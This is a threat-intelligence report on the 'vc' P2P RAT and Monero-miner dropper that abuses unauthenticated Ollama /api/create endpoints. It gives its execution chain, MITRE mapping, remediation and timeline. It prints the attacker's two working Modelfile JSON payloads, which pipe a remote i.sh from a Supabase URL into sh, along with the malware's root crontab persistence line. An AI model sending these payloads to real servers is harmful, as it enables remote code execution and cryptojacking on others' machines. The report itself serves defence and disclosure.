Threat reportMalwareTL-2026-0553
Stealthy P2P Cryptominer Targeting Ollama Endpoints — Custom Go-Based 'vc' RAT/Dropper (Akamai SIRT)
Stealthy P2P Cryptominer Targeting Ollama Endpoints (TL-2026-0553), also tracked as vc cryptominer, is a high-severity malware campaign, first published 2026-05-21. It has no confirmed attribution, affects Ollama Ollama, maps to 23 MITRE ATT&CK techniques (T1027.002, T1036.003, T1036.005), and is covered by 9 detection rules and 28 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 23MITRE ATT&CK
- Actors
- 0Not attributed
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 28Indicators of compromise
Key facts for TL-2026-0553
- Threat ID
- TL-2026-0553
- Also known as
- vc cryptominer, vc RAT, core-node-01
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution confidence
- NONE
- Motivation
- FINANCIAL
- Target sectors
- technology, ai-infrastructure, research, academia, cloud-services
- Target regions
- Global, North America, Europe, Asia
- Detection rules
- 9
- Indicators of compromise
- 28
Malware and tooling in Stealthy P2P Cryptominer Targeting Ollama Endpoints
Malware and tooling: hydraPersistence, vc, UPX, XMRig, libp2p
How Stealthy P2P Cryptominer Targeting Ollama Endpoints works
Akamai SIRT identified a custom Go-based peer-to-peer Remote Access Trojan named 'vc' that operates as a backdoor and cryptominer dropper targeting exposed Ollama LLM endpoints. The attacker abuses the unauthenticated /api/create endpoint on TCP 11434 with malicious Modelfile payloads (RUN and TEMPLATE+exec injection) to pipe a curl|sh installer (i.sh) into the host, dropping a UPX-packed Go binary that runs as the Ollama process owner. The malware uses a custom libp2p stack (WebRTC, QUIC, DTLS, UPnP) to route Monero (XMRig) mining traffic through a decentralized P2P network, eliminating any single C2 IP/domain to block.
On 2026-05-21 Akamai's Security Intelligence Response Team (Larry Cashdollar) published forensic analysis of a novel custom Go-based malware family observed attacking the SIRT's purpose-built LLM honeypot. The malware, internally named 'vc', is delivered through abuse of legitimate Ollama Modelfile functionality on internet-exposed Ollama servers (default TCP port 11434, no authentication).
Initial Access: The attacker sends a POST to /api/create with one of two crafted Modelfile payloads. Payload 1 uses the RUN directive to execute a curl-piped-to-shell command at model creation time:
{"name":"sys_check","modelfile":"FROM scratch\nRUN curl -sL https://auzhpjmyaqayopaqidmc.supabase.co/storage/v1/object/public/p/i.sh | sh","stream":false}
Payload 2 uses the TEMPLATE directive combined with the Ollama exec() template helper to achieve the same shell command execution at template render time:
{"name":"sys_update","modelfile":"FROM scratch\nTEMPLATE \"{{ .Prompt }} {{ exec \\\"curl -sL https://auzhpjmyaqayopaqidmc.supabase.co/storage/v1/object/public/p/i.sh | sh\\\" }}\"","stream":false}
Both payloads cause the Ollama server to download and execute attacker-controlled shell code as the user account running the Ollama process. The download URL is hosted on a public Supabase storage bucket (auzhpjmyaqayopaqidmc.supabase.co), abusing a legitimate cloud service to evade reputation-based blocking.
Installer Script (i.sh): The shell installer is a minimal failover downloader. It writes the next-stage binary to a RAM-disk path /dev/shm/.sys-update, executes it in the background, and never touches conventional persistent filesystems. Failover logic tries curl, then wget, then a Python 3 urllib.request fallback, ensuring delivery on diverse Linux hosts.
The 'vc' Binary: vc is a custom x86 binary written in Go 1.25.7, UPX-packed, with a deliberately falsified UPX header inserted to disrupt automated unpackers and static analyzers. The unpacked binary embeds a full libp2p decentralized networking stack — the same framework used by IPFS and Filecoin — supporting WebRTC, QUIC, DTLS, and UPnP NAT traversal. There is no traditional C2 server; mining traffic and command channels are multiplexed through a global libp2p mesh, where the malware advertises peer ID 12D3KooWGfRjvTvgfV4eXnFWLV26GG7TciWX7ycBiGPnA7ubVmbG and internal node identifier core-node-01.
Execution Chain (seven steps observed by Akamai): 1) The binary copies itself to /dev/shm/.udev-mesh-node (RAM disk; bypasses disk-based EDR scans). 2) Drops two additional binaries into RAM: /dev/shm/kworker-main (the 21 MB libp2p P2P proxy) and /dev/shm/kworker-run (a 2.6 MB XMRig Monero miner). 3) Renames the main process to kworker-main (matches kernel-thread name convention to evade ps inspection). 4) Starts a local Stratum-style mining proxy on 127.0.0.1:41947, then bridges that proxy through the libp2p mesh to a decentralized mining pool — defeating Stratum-port and pool-IP egress blocks. 5) Launches XMRig with wallet 42qxWtESb9t1jvteBGCJybRiHB2x6fiMmhmosjUxfDsFUMLtJgYheVUaac2dvHrDfwcogpQFbTz4h2GXkB1rxonqUJQnUyz and a 50% CPU cap to remain below noise thresholds. 6) Exposes RAT primitives (arbitrary OS command execution) reachable over the libp2p mesh, executing as the Ollama process owner. 7) Plants a root crontab line for self-healing persistence: */15 * * * * pgrep -x kworker-run || /dev/shm/.udev-mesh-node — relaunching the dropper every 15 minutes if the miner process is missing. Persistence logic is encapsulated in an internal Go function named hydraPersistence.
Defense Evasion Highlights: kworker process masquerade; .udev-mesh-node and .sys-update hidden-file naming; RAM-disk-only execution (no on-disk artifact after i.sh wipes the dropper); fake UPX header; encrypted P2P channel (DTLS); QUIC over UDP/443 blending with normal HTTP/3 egress.
Note on the Underlying Weakness: The Modelfile RUN and TEMPLATE+exec primitives abused here are intended features of the Ollama Modelfile DSL. There is no CVE assigned to the abuse itself; the root cause is internet-exposed Ollama servers bound to 0.0.0.0:11434 without authentication. This same exposure class enabled prior threats including CVE-2024-37032 (ProbLLama, Wiz Research) and the November 2024 Oligo Security cluster (CVE-2024-39719/39720/39721/39722). As of January 2026 (SentinelLABS + Censys) approximately 175,000 unique Ollama instances were exposed worldwide.
MITRE ATT&CK techniques used in TL-2026-0553
Defense Evasion
T1027.002 Obfuscated Files or Information: Software Packing; T1036.003 Rename Legitimate Utilities; T1036.005 Match Legitimate Resource Name or Location; T1070.004 Indicator Removal: File Deletion; T1140 Deobfuscate/Decode Files or Information; T1564.001 Hide Artifacts: Hidden Files and Directories; T1620 Reflective Code Loading; T1622 Debugger Evasion
Persistence
T1053.003 Scheduled Task/Job: Cron
Discovery
Execution
T1059.004 Command and Scripting Interpreter: Unix Shell; T1059.006 Command and Scripting Interpreter: Python; T1204 User Execution
Command and Control
T1071.001 Application Layer Protocol: Web Protocols; T1090.001 Proxy: Internal Proxy; T1090.003 Proxy: Multi-hop Proxy; T1095 Non-Application Layer Protocol; T1105 Ingress Tool Transfer; T1573.002 Encrypted Channel: Asymmetric Cryptography
Initial Access
T1190 Exploit Public-Facing Application
Impact
Resource Development
T1583.006 Acquire Infrastructure: Web Services; T1588.002 Obtain Capabilities: Tool
Affected products and versions in Stealthy P2P Cryptominer Targeting Ollama Endpoints
- Ollama — Ollama
Vulnerable versions: any version exposed on 0.0.0.0:11434 without authentication
Fixed in: mitigated by binding to 127.0.0.1 or fronting with authenticated reverse proxy
Remediation for Stealthy P2P Cryptominer Targeting Ollama Endpoints
Patches
- Upgrade Ollama to the latest release and enable authentication — Ollama added native access controls; configure OLLAMA_HOST=127.0.0.1 if exposure is unintended
Immediate actions
- Isolate any host where the vc binary was executed — disconnect from network immediately
- Inspect /dev/shm for files .udev-mesh-node, .sys-update, kworker-main, kworker-run and remove
- Audit crontabs (root and all users) for entries containing '/dev/shm/' or 'pgrep -x kworker-run' and remove
- Audit ~/.bashrc and systemctl units for any references to kworker-main, kworker-run, or /dev/shm artifacts
- Kill any running processes named kworker-main, kworker-run, or .udev-mesh-node (verify against /proc/<pid>/exe path; legitimate kworker threads have no exe file)
- Capture a memory dump from compromised hosts before reboot — libp2p peer list and crypto keys may be recoverable from RAM
- Block outbound UDP/443 (QUIC) and unexpected WebSocket egress at the perimeter to disrupt P2P mesh communication
- Block outbound traffic to auzhpjmyaqayopaqidmc.supabase.co and cloud-metrics.io
Workarounds
- Firewall TCP 11434 inbound from untrusted networks
- Disable or restrict the Modelfile RUN/TEMPLATE+exec primitives via reverse-proxy request inspection if the upstream Ollama version does not provide a configuration knob
Longer-term hardening
- Never expose Ollama (TCP 11434) directly to the internet — bind to 127.0.0.1 or behind a reverse proxy with authentication
- Place all internal LLM inference endpoints behind an authenticating gateway (API key, mTLS, or zero-trust proxy)
- Deploy EDR with behavioral detection for /dev/shm execution, process-name spoofing of kworker, and outbound P2P/libp2p traffic patterns
- Implement egress filtering allowlists; deny QUIC and WebSocket to non-approved destinations from server workloads
- Monitor /api/create POST bodies for RUN/TEMPLATE Modelfile directives containing shell commands or exec() helpers — treat any 'FROM scratch' with shell payload as malicious
- Establish baseline of legitimate cron entries; alert on cron additions referencing /dev/shm or pgrep self-healing patterns
- Subscribe to Akamai SIRT, Wiz, and Oligo Ollama advisories; track new Ollama CVEs (CVE-2024-37032 / -39719 / -39720 / -39721 / -39722) for patch posture
Weaknesses (CWE) in Stealthy P2P Cryptominer Targeting Ollama Endpoints
Timeline of Stealthy P2P Cryptominer Targeting Ollama Endpoints
- CVE-2024-37032 (ProbLLama) disclosed by Wiz Research — path-traversal RCE in Ollama /api/pull, /api/push, /api/create endpoints in versions prior to 0.1.34; established the threat model for Ollama-endpoint abuse.
- Oligo Security publishes 'More Models, More ProbLLMs' disclosing CVE-2024-39719/39720/39721/39722 — additional vulnerabilities in unauthenticated Ollama management endpoints including /api/create.
- SentinelLABS and Censys ('Operation Bizarre Bazaar') report approximately 175,000 publicly exposed Ollama instances worldwide, none with authentication — the attack surface for the vc dropper.
- Akamai SIRT honeypot begins recording the /api/create RUN and TEMPLATE+exec payloads delivering the i.sh installer from auzhpjmyaqayopaqidmc.supabase.co (approximate; Akamai blog cites 'recent' observation prior to publication).
- Threadlinqs Intelligence ingests the threat as TL-2026-0553 with full IOC, MITRE, and detection coverage.
- Akamai SIRT (Larry Cashdollar) publishes forensic analysis of the vc Go-based P2P RAT/cryptominer dropper, releasing SHA256 hashes for i.sh and vc (packed/unpacked), the libp2p peer ID 12D3KooWGfRjvTvgfV4eXnFWLV26GG7TciWX7ycBiGPnA7ubVmbG, the Monero wallet 42qxWtESb9t1jv..., and recommended mitigations.
- As of 2026-05-29, the 'vc' Ollama cryptominer/RAT (Akamai SIRT, 2026-05-21) remains active: no CVE, no takedown, and its decentralized libp2p C2 plus public-cloud staging are takedown-resistant by design. The root cause (~175,000 unauthenticated Ollama hosts on 11434) is unpatched and independently confirmed under heavy 2026 exploitation; config-only mitigation (bind 127.0.0.1/auth).
Sources cited for Stealthy P2P Cryptominer Targeting Ollama Endpoints
- Decentralized Threat: Stealthy P2P Cryptominer Targeting Ollama Endpoints
- Probllama: Ollama Remote Code Execution Vulnerability (CVE-2024-37032)
- NVD - CVE-2024-37032
- More Models, More ProbLLMs — Six Vulnerabilities in Ollama
- Researchers Find 175,000 Publicly Exposed Ollama AI Servers
- Ollama Drama — Investigating the Prevalence of Open Ollama Instances
- libp2p — Modular peer-to-peer networking stack
- XMRig — Monero CPU miner
Detection coverage for TL-2026-0553
As of 2026-05-21, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0553 across Splunk SPL, Microsoft KQL and Sigma, covering 28 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.